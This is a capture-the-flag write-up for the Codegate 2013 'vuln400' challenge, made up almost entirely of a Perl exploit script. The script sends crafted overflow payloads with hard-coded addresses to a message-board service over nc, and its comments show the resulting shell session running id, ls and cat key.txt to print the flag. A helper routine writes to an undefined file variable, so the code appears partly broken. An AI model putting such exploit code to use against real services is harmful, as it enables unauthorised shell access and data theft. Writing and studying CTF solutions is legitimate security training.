Rating:

#!/usr/bin/perl
# codegate2013 vuln400 exploit
# cutz
#
# $ (perl expl_vuln400.pl;cat) | nc 58.229.122.20 6666
# _______________________________
# /==============================/
# | Onetime Board Console |
# /------------------------------/
# | | WELCOME | |
# |__________|_________|_________|
# | W a i t |
# ++++++++++++++++++++++++++++++++
# .....
# => Author : Title :
# 1. delete 2. modify 3. reply 4. back
# => id
# uid=1000(onetime) gid=1000(onetime) groups=1000(onetime)
# cd /home/onetime
# ls
# key.txt
# onetime
# cat key.txt
# U_g0t_M4_Buddy

_write("YOLO", "YOLO", "A"x36 . pack("I", 0x80487c4) .
"A"x604 . pack("I", 0x80487c4) . "\x30\x86\x04\x08"x80) for 1 .. 7;
for (1 .. 7) {
_read($_);
_reply("YOLO") for 1 .. 127;
_back();
_back();
}
for (2 .. 6) {
_read($_);
_delete();
_back();
_back();
}
_write("YOLO", "YOLO", "YOLO") for 1 .. 2;
_read(8);
_reply("sh") for 1 .. 127;
_modify("A", "B");
_delete();
_exit();

sub _read
{
$num = shift;
$cmd = "2\n" . "$num\n";
print($cmd);
}

sub _delete
{
$cmd = "1\n";
print($cmd);
}

sub _modify
{

$author = shift;
$title = shift;
$cmd = "2\n" . "$author\n" . "$title\n";
print($cmd);
}

sub _reply
{
$msg = shift;
$cmd = "3\n" . "$msg\n";
print($cmd);
}

sub _back
{
$cmd = "4\n";
print($cmd);
}

sub _exit
{
$cmd = "3\n";
print($cmd);
}

sub _write
{
$author = shift;
$title = shift;
$content = shift;
$cmd = "1\n". "$author\n". "$title\n". "$content\n";
print($cmd);
}

sub print
{
$cmd = shift;

open F, ">$file";
print F $cmd;
close F;
}

Original writeup (http://pastie.org/pastes/6370773/text?key=eprons3cuxjkliahugueqg).